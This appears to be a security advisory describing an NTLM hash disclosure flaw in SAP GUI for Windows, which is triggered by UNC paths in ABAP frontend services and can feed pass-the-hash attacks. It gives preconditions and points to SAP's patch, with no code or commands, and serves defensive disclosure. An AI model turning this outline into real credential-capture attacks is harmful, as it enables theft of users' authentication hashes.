SAP GUI for Windows NTLM Hash Leak Vulnerability

A vulnerability in SAP GUI for Windows could lead to the unintentional disclosure of NTLM hash values. This issue arises when certain ABAP frontend services are accessed using UNC paths. For the vulnerability to be exploited, the attacker must have developer authorization on a specific Application Server ABAP to modify the code. Additionally, the victim must use SAP GUI for Windows, which could trigger automatic NTLM authentication, potentially revealing hashed credentials to the attacker. This vulnerability significantly impacts confidentiality.

Impact

Exploitation of this vulnerability could result in the unauthorized exposure of NTLM hash credentials, allowing an attacker to potentially misuse these hashes in authentication-related attacks, such as pass-the-hash scenarios.

Remediation

Users are advised to review and implement the SAP Security Note related to this vulnerability, available through the SAP Security Patch Day Bulletin. For guidance on accessing and applying SAP Security Notes, refer to the SAP Security Notes FAQs.